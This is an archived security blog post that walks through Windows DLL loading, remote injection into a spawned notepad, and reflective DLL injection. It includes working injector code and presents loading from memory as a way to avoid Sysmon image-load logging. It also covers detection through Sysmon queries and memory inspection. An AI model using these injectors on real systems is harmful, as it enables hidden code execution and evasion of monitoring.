Exploring DLL Loads, Links, and Execution

This is an archived post from 2021. I have since revisited it (TBD) ⚠

Introduction

Right, so, this is a bit of a long one. I want to go over a few methods of loading DLLs into processes, then build on that by looking at Reflective DLLs, some Sysmon events associated with loading DLLs, and finally DarkLoadLibrary, which could be a great alternative to bootstrapping DLLs.

Before we get into loading DLLs, the following statement is from Microsoft, in the What is a DLL article:

For the Windows operating systems, much of the functionality of the operating system is provided by DLL. Additionally, when you run a program on one of these Windows operating systems, much of the functionality of the program may be provided by DLLs. For example, some programs may contain many different modules, and each module of the program is contained and distributed in DLLs.

The use of DLLs helps promote modularization of code, code reuse, efficient memory usage, and reduced disk space. So, the operating system and the programs load faster, run faster, and take less disk space on the computer.

Essentially, a DLL, or Dynamic-Link Library, is a library that contains code and data and provides a modular approach to code. When we use a function like LoadLibraryA, we're pulling that from kernel32.dll:

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          4AC6099C86B3039356359A7D31026BF056872EBBF8A8E551A1115919E54FB772       C:\Windows\system32\kernel32.dll

Thinking about this offensively, it makes sense that DLLs being loaded into processes could be a great way to execute arbitrary code.

Loading A DLL from Disk

Let's take a look at a programmatic way of loading a given DLL into a process when that DLL is on the same disk as the executable.

The DLL that will be used for debugging:

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        MessageBoxA(nullptr, "DLL_PROCESS_ATTACH", "DLL_PROCESS_ATTACH", MB_OK);
        break;
    case DLL_THREAD_ATTACH:
        MessageBoxA(nullptr, "DLL_THREAD_ATTACH", "DLL_THREAD_ATTACH", MB_OK);
        break;
    case DLL_THREAD_DETACH:
        MessageBoxA(nullptr, "DLL_THREAD_DETACH", "DLL_THREAD_DETACH", MB_OK);
        break;
    case DLL_PROCESS_DETACH:
        MessageBoxA(nullptr, "DLL_PROCESS_DETACH", "DLL_PROCESS_DETACH", MB_OK);
        break;
    }
    return TRUE;
}

Depending on the way the DLL is loaded, it will throw a MessageBoxA telling us which method of attachment was used.

This could even be a one-liner:

#include <stdio.h>
#include <windows.h>

int main()
{
    LPCSTR path = "..\\Release\\debug-dll.dll";

    printf("%p\n", LoadLibraryA(path));

    return 0;
}

Running this:

All that's happened here is that LoadLibraryA has been called on our debug-dll.dll from earlier. Here is a quick description of LoadLibraryA:

LoadLibrary can be used to load a library module into the address space of the process and return a handle that can be used in GetProcAddress to get the address of a DLL function. LoadLibrary can also be used to load other executable modules. For example, the function can specify an .exe file to get a handle that can be used in FindResource or LoadResource. However, do not use LoadLibrary to run an .exe file. Instead, use the CreateProcess function.

If we look up the loader in Process Hacker, we can see the DLL has been linked to the Process Environment Block (PEB):

Loading a DLL into a remote process is a bit more complicated, as it requires us to do a bit of process injection. I discussed DLL Injection in-depth in Process Injection Part 1: The Theory, so I won't go into detail here. But, essentially, what is happening in the following code is that a sacrificial process is created with CreateProcessA and a given DLL is then injected into it. This just means that we create a process, write the DLL's path into its memory, and have it load the DLL from there.

The code:

void remote_load_dll(LPCSTR path)
{
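    LPSTARTUPINFOA si = new STARTUPINFOA();
    PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
    si->cb = sizeof(STARTUPINFOA); // CreateProcess expects cb to hold the structure size

    // CreateProcessA returns a BOOL: zero means failure.
    if (!CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi))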
    {
        printf("[!] Failed to create process!\n");
        return;
    }
    else
    {
        printf("  :: Process ID: %lu\n", pi->dwProcessId);
        printf("  :: Process Handle: %p\n", pi->hProcess);

        // Include the terminating NUL so LoadLibraryA sees a complete string.
        SIZE_T len = strlen(path) + 1;

        // The buffer only holds the DLL path, so it does not need to be executable.
        LPVOID pAddress = VirtualAllocEx(pi->hProcess, nullptr, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        printf("  :: Base Address: %p\n", pAddress);
        WriteProcessMemory(pi->hProcess, pAddress, (LPVOID)path, len, NULL);
        PTHREAD_START_ROUTINE pRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
        printf("  :: THREAD_START_ROUTINE: %p\n", pRoutine);
        HANDLE hThread = CreateRemoteThread(pi->hProcess, NULL, 0, pRoutine, pAddress, 0, NULL);
        printf("  :: Thread: %p\n", hThread);
        if (pi->hProcess)CloseHandle(pi->hProcess);
        if (pi->hThread)CloseHandle(pi->hThread);
        if (hThread)CloseHandle(hThread);
    }
}

Process ID 16684 was created and injected into, loading the MessageBoxA DLL:

The issue we have here is that the DLL is being loaded from disk, meaning that, in an offensive scenario, the malicious DLL will have to be written to the target's disk. Only the path to the DLL is written into the remote process:

SIZE_T len = strlen(path) + 1; // include the terminating NUL
LPVOID pAddress = VirtualAllocEx(pi->hProcess, nullptr, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
WriteProcessMemory(pi->hProcess, pAddress, (LPVOID)path, len, NULL);
PTHREAD_START_ROUTINE pRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
HANDLE hThread = CreateRemoteThread(pi->hProcess, NULL, 0, pRoutine, pAddress, 0, NULL);

The debug-dll.dll can also be seen in the linked modules:

Let's look at a way of removing the requirement for on-disk DLLs to reduce the chance of being so obvious.

Reflective DLL

This is where Reflective DLLs come into it. Reflective DLLs allow for DLLs to be loaded entirely from memory. A good introduction to Reflective DLLs can be seen in What is Reflective DLL Injection and how can be detected?.

This technique was originally written by Stephen Fewer and the original code can be found in stephenfewer/ReflectiveDLLInjection. The repository provided by Stephen Fewer goes over how this technique works quite well:

  1. Execution is passed, either via CreateRemoteThread() or a tiny bootstrap shellcode, to the library's ReflectiveLoader function which is an exported function found in the library's export table.

  2. As the library's image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image's current location in memory so as to be able to parse its own headers for use later on.

  3. The ReflectiveLoader will then parse the host processes kernel32.dll export table in order to calculate the addresses of three functions required by the loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.

  4. The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on.

  5. The library's headers and sections are loaded into their new locations in memory.

  6. The ReflectiveLoader will then process the newly loaded copy of its image's import table, loading any additional library's and resolving their respective imported function addresses.

  7. The ReflectiveLoader will then process the newly loaded copy of its image's relocation table.

  8. The ReflectiveLoader will then call its newly loaded image's entry point function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully loaded into memory.

  9. Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via CreateRemoteThread, the thread will terminate.
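To make step 7 a bit more concrete, here is a minimal, portable sketch of processing a relocation table on an image that has already been copied to its new location. This is not Stephen Fewer's code: ApplyRelocations, Load, and their parameters are names I made up for illustration. It only handles the 64-bit IMAGE_REL_BASED_DIR64 type (value 10) plus the padding type (value 0), and it assumes a little-endian host.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Relocation types from the PE format (upper 4 bits of each 16-bit entry).
constexpr uint16_t kRelBasedAbsolute = 0;  // padding, nothing to patch
constexpr uint16_t kRelBasedDir64    = 10; // 64-bit absolute address

// Hypothetical helper: reads a T from the image at a byte offset.
template <typename T>
T Load(const std::vector<uint8_t>& image, size_t offset)
{
    assert(offset + sizeof(T) <= image.size());
    T value;
    std::memcpy(&value, image.data() + offset, sizeof(T));
    return value;
}

// image:     the DLL as laid out in memory (sections at their RVAs)
// relocRva:  RVA of the base relocation directory
// relocSize: size of that directory in bytes
// delta:     actual load address minus the preferred ImageBase
bool ApplyRelocations(std::vector<uint8_t>& image, uint32_t relocRva,
                      uint32_t relocSize, uint64_t delta)
{
    size_t pos = relocRva;
    const size_t end = static_cast<size_t>(relocRva) + relocSize;
    if (end > image.size()) return false;

    // Each block: DWORD page RVA, DWORD block size, then 16-bit entries.
    while (pos + 8 <= end) {
        const uint32_t pageRva   = Load<uint32_t>(image, pos);
        const uint32_t blockSize = Load<uint32_t>(image, pos + 4);
        if (blockSize < 8 || blockSize > end - pos) return false;

        const size_t entryCount = (blockSize - 8) / sizeof(uint16_t);
        for (size_t i = 0; i < entryCount; ++i) {
            const uint16_t entry  = Load<uint16_t>(image, pos + 8 + i * 2);
            const uint16_t type   = entry >> 12;     // upper 4 bits
            const uint16_t offset = entry & 0x0FFF;  // lower 12 bits

            if (type == kRelBasedAbsolute) continue; // alignment padding
            if (type != kRelBasedDir64) return false; // not handled here

            const size_t target = static_cast<size_t>(pageRva) + offset;
            if (target + sizeof(uint64_t) > image.size()) return false;

            // Shift the stored absolute address by the load delta.
            const uint64_t patched = Load<uint64_t>(image, target) + delta;
            std::memcpy(image.data() + target, &patched, sizeof(patched));
        }
        pos += blockSize;
    }
    return true;
}
```

The idea is simply that every absolute address baked into the image at link time gets shifted by the difference between where the image wanted to live and where it actually ended up.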

The exported function can be seen on line 49 and will be an indicator that we will look at later on. Additionally, ReflectiveLoader.c is very well commented, so between the technique explanation and the code comments, I won't describe everything it is doing.

Let's write something malicious to demonstrate the Reflective DLL process.

First off, the actual DLL. This is very similar to the debug-dll.dll from earlier, in that it will throw a MessageBoxA. The example that will follow is practically identical to ReflectiveDll.c provided by Stephen Fewer. Here is the code we will be working with:

#include "ReflectiveLoader.h"
#include <windows.h>

extern "C" HINSTANCE hAppInstance;
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    BOOL bReturnValue = TRUE;
    switch (dwReason)
    {
    case DLL_QUERY_HMODULE:
        if (lpReserved != NULL)
        {
            *(HMODULE*)lpReserved = hAppInstance;
        }
        break;
    case DLL_PROCESS_ATTACH:
        hAppInstance = hinstDLL;
        MessageBoxA(nullptr, "DLL_PROCESS_ATTACH", "DLL_PROCESS_ATTACH", MB_OK);
        break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }
    return bReturnValue;
}

That is the DLL to be injected, so let's look at writing a tool to load this DLL into the target process.

The Injector: Reflective Prerequisites

Before writing the actual injection mechanism, some utility functions are needed. I got these by trial and error against the provided repository, stripping things out until only the minimum required functions were left, which were these two:

#include <windows.h>
#include <stdio.h>

#define WIN_X64
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)

DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{    
    WORD wIndex                          = 0;
    PIMAGE_SECTION_HEADER pSectionHeader = NULL;
    PIMAGE_NT_HEADERS pNtHeaders         = NULL;
    
    pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);

    pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);

    if( dwRva < pSectionHeader[0].PointerToRawData )
        return dwRva;

    for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
    {   
        if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )           
           return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
    }
    
    return 0;
}

DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
{
    UINT_PTR uiBaseAddress   = 0;
    UINT_PTR uiExportDir     = 0;
    UINT_PTR uiNameArray     = 0;
    UINT_PTR uiAddressArray  = 0;
    UINT_PTR uiNameOrdinals  = 0;
    DWORD dwCounter          = 0;
#ifdef WIN_X64
    DWORD dwCompiledArch = 2;
#else
    // This will catch Win32 and WinRT.
    DWORD dwCompiledArch = 1;
#endif

    uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;

    // get the File Offset of the modules NT Header
    uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;

    // currently we can only process a PE file which is the same type as the one this function has
    // been compiled as, due to various offsets in the PE structures being defined at compile time.
    if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
    {
        if( dwCompiledArch != 1 )
            return 0;
    }
    else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
    {
        if( dwCompiledArch != 2 )
            return 0;
    }
    else
    {
        return 0;
    }

    // uiNameArray = the address of the modules export directory entry
    uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];

    // get the File Offset of the export directory
    uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );

    // get the File Offset for the array of name pointers
    uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );

    // get the File Offset for the array of addresses
    uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );

    // get the File Offset for the array of name ordinals
    uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );    

    // get a counter for the number of exported functions...
    dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;

    // loop through all the exported functions to find the ReflectiveLoader
    while( dwCounter-- )
    {
        char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));

        if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
        {
            // get the File Offset for the array of addresses
            uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );   
    
            // use the function's name ordinal as an index into the array of function addresses
            uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );

            // return the File Offset to the ReflectiveLoader() functions code...
            return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
        }
        // get the next exported function name
        uiNameArray += sizeof(DWORD);

        // get the next exported function name ordinal
        uiNameOrdinals += sizeof(WORD);
    }

    return 0;
}

Again, the code is very well commented, but in short, the two functions are:

Rva2Offset:

Converts a Relative Virtual Address (RVA) into an offset within the raw file, which is used to find the entry-point later on.

GetReflectiveLoaderOffset:

Does what it says on the tin: it walks the export table, using Rva2Offset along the way, to find the file offset of the ReflectiveLoader export.
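As a worked example of what Rva2Offset is doing, here is a small, portable sketch that runs the same lookup over a made-up section table. The Section struct, RvaToFileOffset, and the section values in the usage note are all hypothetical and only exist to show the arithmetic; the real function reads the section headers straight out of the PE.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Just the three section header fields the conversion needs.
struct Section {
    uint32_t virtualAddress;   // RVA where the section is mapped
    uint32_t sizeOfRawData;    // bytes the section occupies in the file
    uint32_t pointerToRawData; // file offset of the section's data
};

uint32_t RvaToFileOffset(uint32_t rva, const std::vector<Section>& sections)
{
    assert(!sections.empty()); // the sketch assumes at least one section

    // Anything before the first section's raw data is header data, which
    // sits at the same offset on disk and in memory.
    if (rva < sections[0].pointerToRawData)
        return rva;

    for (const Section& s : sections) {
        // Is the RVA inside this section's file-backed range?
        if (rva >= s.virtualAddress && rva < s.virtualAddress + s.sizeOfRawData)
            return rva - s.virtualAddress + s.pointerToRawData;
    }
    return 0; // not backed by any section's raw data
}
```

With a .text section mapped at RVA 0x1000 whose raw data starts at file offset 0x400 and is 0x600 bytes long, RVA 0x1234 becomes 0x1234 - 0x1000 + 0x400 = 0x634. This matters because the injector copies the raw file into memory, so everything has to be addressed by file offset rather than by RVA.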

With that done, let's look at getting a DLL into memory. At first, I did it the old xxd way, but the DLL came out to be 90,000 bytes, which was killing Visual Studio. So, I opted for a method of reading the bytes into an LPVOID, which is basically the same format it would be in anyway!

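DWORD ReadBytes(char* path, LPVOID* shellcode) {
    HANDLE hFile;
    DWORD  size, readAmount = 0;

    *shellcode = NULL; // stays NULL if anything below fails

    hFile = CreateFileA(path, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile != INVALID_HANDLE_VALUE) {
        size = GetFileSize(hFile, 0);
        if (size != INVALID_FILE_SIZE) {
            *shellcode = malloc(size + 16);
            // Report zero bytes if the allocation or the read fails.
            if (*shellcode == NULL || !ReadFile(hFile, *shellcode, size, &readAmount, 0)) {
                readAmount = 0;
            }
        }
        CloseHandle(hFile);
    }
    return readAmount;
}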

FYI, the dll size from xxd:

unsigned int reflective_debug_dll_dll_len = 93696;
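For comparison, the same "read the whole file into a buffer" idea can be sketched with nothing but the C++ standard library. ReadAllBytes is a hypothetical name, not something from the original loader, and it returns an empty vector on any failure rather than a byte count.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <fstream>
#include <string>
#include <vector>

// Hypothetical portable counterpart to ReadBytes.
std::vector<uint8_t> ReadAllBytes(const std::string& path)
{
    // Open at the end so tellg() gives us the file size.
    std::ifstream file(path, std::ios::binary | std::ios::ate);
    if (!file) return {};

    const std::streamoff size = file.tellg();
    if (size <= 0) return {};

    std::vector<uint8_t> bytes(static_cast<size_t>(size));
    file.seekg(0, std::ios::beg);
    if (!file.read(reinterpret_cast<char*>(bytes.data()), size)) return {};

    assert(file.gcount() == size); // a successful read consumed everything
    return bytes;
}
```

The vector owns the memory, so there is nothing to free by hand, and bytes.data() and bytes.size() can be passed to anything that expects a buffer and a length.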

The Injector: Local

For the most part, this is a completely bog-standard injection. Here is the code:

int main(void)
{
    const char* path = "C:\\Users\\mez0\\Desktop\\reflective-dll-blog\\dll-shenanigans\\x64\\Release\\reflective-debug-dll.dll";
    LPVOID buf;
    DWORD bufSz = ReadBytes((char*)path, &buf);

    LPVOID pAddress = nullptr;
    BOOL bProtect;
    HANDLE hThread;
    DWORD lpflOldProtect = 0;
    DWORD dwLdrOffset = 0;

    if (bufSz == 0)
        return 1; // nothing was read from disk

    // Resolve the loader first; a zero offset means the export was not found
    // or the DLL's architecture does not match this injector.
    dwLdrOffset = GetReflectiveLoaderOffset(buf);
    if (dwLdrOffset == 0)
        return 1;

    pAddress = VirtualAlloc(0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    RtlMoveMemory(pAddress, buf, bufSz);
    bProtect = VirtualProtect(pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);

    LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

    hThread = CreateThread(0, 0, lpStartAddress, 0, 0, 0);
    // Block until ReflectiveLoader has parsed and loaded the DLL and DllMain has returned.
    WaitForSingleObject(hThread, INFINITE);
}

Executing this:

There is one difference here, and it is the LPTHREAD_START_ROUTINE. Usually, it is just the base address returned by VirtualAlloc. This time, the offset returned by GetReflectiveLoaderOffset is added to that base address, so the thread starts at the exported ReflectiveLoader function rather than at the start of the buffer.
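The export lookup behind GetReflectiveLoaderOffset boils down to three parallel arrays, which can be sketched portably as below. ExportTable and FindExportRva are hypothetical names, and the table is pre-resolved into vectors instead of being read out of a PE, so treat this as an illustration of the indexing only.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// A simplified view of IMAGE_EXPORT_DIRECTORY's three arrays.
struct ExportTable {
    std::vector<std::string> names;     // AddressOfNames, resolved to strings
    std::vector<uint16_t> nameOrdinals; // AddressOfNameOrdinals
    std::vector<uint32_t> functions;    // AddressOfFunctions (RVAs)
};

// Returns the RVA of the first export whose name contains `needle`,
// or 0 if there is no such export.
uint32_t FindExportRva(const ExportTable& table, const std::string& needle)
{
    // Names and name ordinals are parallel arrays of the same length.
    assert(table.names.size() == table.nameOrdinals.size());

    for (size_t i = 0; i < table.names.size(); ++i) {
        // Substring match, like the strstr call in the original, so that
        // decorated names such as "_ReflectiveLoader@4" still match.
        if (table.names[i].find(needle) == std::string::npos)
            continue;

        // The name's ordinal is an index into the function address array.
        const uint16_t ordinal = table.nameOrdinals[i];
        if (ordinal >= table.functions.size())
            return 0;
        return table.functions[ordinal];
    }
    return 0;
}
```

The real function then runs the resulting RVA through Rva2Offset, because the thread start address is the base of the raw copy plus a file offset, not the base plus an RVA.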

The Injector: Remote

This next piece of code is a combination of the process injection from earlier, and the GetReflectiveLoaderOffset in the previous segment:

void remote_exec(DWORD bufSz, LPVOID buf)
{
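    LPSTARTUPINFOA si = new STARTUPINFOA();
    PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
    si->cb = sizeof(STARTUPINFOA); // CreateProcess expects cb to hold the structure size

    // CreateProcessA returns a BOOL: zero means failure.
    if (!CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi))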
    {
        printf("[!] Failed to create process!\n");
        return;
    }
    else
    {
        printf("  :: Process ID: %d\n", pi->dwProcessId);
        printf("  :: Process Handle: %p\n", pi->hProcess);

        LPVOID pAddress = nullptr;
        BOOL bProtect;
        HANDLE hThread;
        DWORD lpflOldProtect = 0;
        DWORD dwLdrOffset = 0;

        pAddress = VirtualAllocEx(pi->hProcess, 0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        WriteProcessMemory(pi->hProcess, pAddress, buf, bufSz, NULL);
        bProtect = VirtualProtectEx(pi->hProcess, pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);
        dwLdrOffset = GetReflectiveLoaderOffset(buf);

        LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

        hThread = CreateRemoteThread(pi->hProcess, 0, 0, lpStartAddress, 0, 0, 0);
        WaitForSingleObject(hThread, 5000);

        if (pi->hProcess)CloseHandle(pi->hProcess);
        if (pi->hThread)CloseHandle(pi->hThread);
        if (hThread)CloseHandle(hThread);
    }
    return;
}

Executing this, notepad spawns and is injected into:

Investigating the loads

Now that we've looked at both a standard and a reflective DLL, let's inspect the loads. Below is a screenshot of the Reflective DLL being loaded from memory; no reflective-debug-dll.dll can be seen in the linked modules:

It makes sense: we're executing a DLL from a bootstrapped entry-point, meaning it's not a traditional DLL load. But does it trigger the kernel callbacks registered with PsSetLoadImageNotifyRoutine?

First off, startLogging.xml from cyb3rward0g is used as the configuration file for Sysmon. Image loads are logged under event ID 7; below is the relevant config segment:

<RuleGroup name="" groupRelation="or">
    <!-- Event ID 7 == Image Loaded. Log everything except -->
    <ImageLoad onmatch="exclude">
        <Image condition="image">chrome.exe</Image>
        <Image condition="image">vmtoolsd.exe</Image>
        <Image condition="image">Sysmon.exe</Image>
        <Image condition="image">mmc.exe</Image>
        <Image condition="is">C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Image>
        <Image condition="is">C:\Windows\System32\taskeng.exe</Image>
        <Image condition="is">C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe</Image>
        <Image condition="is">C:\Program Files\Windows Defender\NisSrv.exe</Image>
        <Image condition="is">C:\Program Files\Windows Defender\MsMpEng.exe</Image>
        <Image condition="end with">onedrivesetup.exe</Image>
        <Image condition="end with">onedrive.exe</Image>
        <Image condition="end with">skypeapp.exe</Image>
        <Image condition="begin with">C:\Packages\Plugins\</Image> <!--Azure ARM Extensions -->
        <Image condition="begin with">C:\WindowsAzure\</Image> <!--Azure -->
    </ImageLoad>
</RuleGroup>

Generally, Get-WinEvent can be used to query Sysmon:

Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational"|where {$_.id -eq 7}

As we know that the on-disk loader loads DLLs as Windows expects, we can use that to verify that Sysmon is working correctly. The screenshot below shows on-disk-loader.exe loading debug-dll.dll into the current process (denoted by the 1):

A bunch of Image loaded events are found.

To look up the event in more detail, Event Viewer can be used by going to the following path:

Applications and Services Logs -> Microsoft -> Windows -> Sysmon -> Operational

Then the events can be seen as such:

Or, here is a dirty little bit of PowerShell:

$eventId = 7
$logName = "Microsoft-Windows-Sysmon/Operational"

$loader = "on-disk-loader.exe"
$dll = "debug-dll.dll"

# Only look at the last hour of events.
$since = (Get-Date).AddHours(-1)
$events = Get-WinEvent -FilterHashtable @{logname=$logName; id=$eventId; StartTime=$since}

# $event is an automatic variable in PowerShell, so use a different loop variable.
foreach($evt in $events)
{
    $msg = $evt.Message.ToString()
    $image = ($msg|Select-String -Pattern 'Image:.*').Matches.Value.Replace("Image: ", "")
    $imageLoaded = ($msg|Select-String -Pattern 'ImageLoaded:.*').Matches.Value.Replace("ImageLoaded: ", "")
    $utcTime = ($msg|Select-String -Pattern 'UtcTime:.*').Matches.Value.Replace("UtcTime: ", "")
   
    if($image.contains($loader) -and $imageLoaded.Contains($dll))
    {
        Write-Host $image loaded $imageLoaded at $utcTime
    }
}

This will give something like:

The script can be updated for the reflective DLL by changing $loader to the in-mem-loader PE and $dll to reflective-debug-dll.dll:

$eventId = 7
$logName = "Microsoft-Windows-Sysmon/Operational"

$loader = "in-mem-loader.exe"
$dll = "reflective-debug-dll.dll"

# Only look at the last hour of events.
$since = (Get-Date).AddHours(-1)
$events = Get-WinEvent -FilterHashtable @{logname=$logName; id=$eventId; StartTime=$since}

# $event is an automatic variable in PowerShell, so use a different loop variable.
foreach($evt in $events)
{
    $msg = $evt.Message.ToString()
    $image = ($msg|Select-String -Pattern 'Image:.*').Matches.Value.Replace("Image: ", "")
    $imageLoaded = ($msg|Select-String -Pattern 'ImageLoaded:.*').Matches.Value.Replace("ImageLoaded: ", "")
    $utcTime = ($msg|Select-String -Pattern 'UtcTime:.*').Matches.Value.Replace("UtcTime: ", "")
   
    if($image.contains($loader) -and $imageLoaded.Contains($dll))
    {
        Write-Host $image loaded $imageLoaded at $utcTime
    }
}

Below is a screenshot of the Reflective DLL being loaded and the script not finding any events:

This makes sense as a DLL is not being loaded the traditional way, but it comes with some OpSec considerations.

x64dbg tangent

The first thing I want to look at is the DLL in memory. After loading the loader up in x64dbg and setting a breakpoint on VirtualAlloc, the RBP register shows the MZ magic bytes. The base address VirtualAlloc returns matches both the printed statement and the RBP register, and following it into a dump shows the full DOS header:

Dumping the memory to disk:

Armed with a memory dump, we can load it up into PE-Bear and see that this is the valid Reflective DLL:
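The same sanity check PE-Bear is doing visually can be roughed out in code. Below is a minimal sketch that checks a dumped buffer for the MZ magic, follows e_lfanew to the PE signature, and reads the optional header magic. ClassifyPe, PeKind, and Read are names I made up, the offsets are the standard PE layout ones, and a little-endian host is assumed.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

enum class PeKind { Invalid, Pe32, Pe64 };

// Hypothetical helper: reads a T from the buffer at a byte offset.
template <typename T>
T Read(const std::vector<uint8_t>& buf, size_t offset)
{
    assert(offset + sizeof(T) <= buf.size());
    T value;
    std::memcpy(&value, buf.data() + offset, sizeof(T));
    return value;
}

PeKind ClassifyPe(const std::vector<uint8_t>& buf)
{
    // The DOS header is 64 bytes long and starts with "MZ".
    if (buf.size() < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return PeKind::Invalid;

    // e_lfanew lives at offset 0x3C and points at the NT headers.
    const uint32_t lfanew = Read<uint32_t>(buf, 0x3C);

    // Need a 4-byte signature, a 20-byte file header, and the 2-byte magic.
    if (lfanew > buf.size() || buf.size() - lfanew < 26)
        return PeKind::Invalid;

    if (std::memcmp(buf.data() + lfanew, "PE\0\0", 4) != 0)
        return PeKind::Invalid;

    // The optional header starts right after the file header.
    const uint16_t magic = Read<uint16_t>(buf, lfanew + 24);
    if (magic == 0x010B) return PeKind::Pe32; // PE32
    if (magic == 0x020B) return PeKind::Pe64; // PE32+
    return PeKind::Invalid;
}
```

These are the same two magic values that GetReflectiveLoaderOffset checks before it touches the export table.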

To sanity check myself, I compared the in-mem-loader to the dumped file to make sure I didn't do anything weird:

Tracking down the ReflectiveLoader export is easy enough in ReflectiveLoader.c:

DLLEXPORT ULONG_PTR WINAPI REFLDR_NAME( VOID )

Where REFLDR_NAME is:

#define REFLDR_NAME ReflectiveLoader

Bit of a tangent, but cool nonetheless.

An Improved Reflective DLL

Something I wanted to quickly bring to light was an improved version of the Reflective DLL that was released by Dan Staples in An Improved Reflective DLL Injection Technique in 2015. Below is a quote from the blog which describes the main improvements made:

It does this by dynamically writing some bootstrap shellcode to the target process which loads the DLL (using LoadLibraryA) and then finds and calls another exported entry point function (using GetProcAddress). While this is a great improvement to traditional DLL injection, it is not reflective.

The new code can be found in dismantl/ImprovedReflectiveDLLInjection.

The article does a great job of detailing the improvements, so I won't repeat them here; I just wanted to point out that improvements have been made to this technique since it was first released.

Shellcode Reflective DLL Injection

Everything achieved so far has required access to the DLL's source code in order to compile the reflective loader component into it. To remove that requirement, a project called sRDI exists. The blog post sRDI – Shellcode Reflective DLL Injection was written to support the project and goes into detail on how it works. But, essentially, it is this:

To quote the blog directly:

When execution starts at the top of the bootstrap, the general flow looks like this:

  1. Get current location in memory (Bootstrap)

  2. Calculate and setup registers (Bootstrap)

  3. Pass execution to RDI with the function hash, user data, and location of the target DLL (Bootstrap)

  4. Un-pack DLL and remap sections (RDI)

  5. Call DLLMain (RDI)

  6. Call exported function by hashed name (RDI) – Optional

  7. Pass user-data to exported function (RDI) – Optional
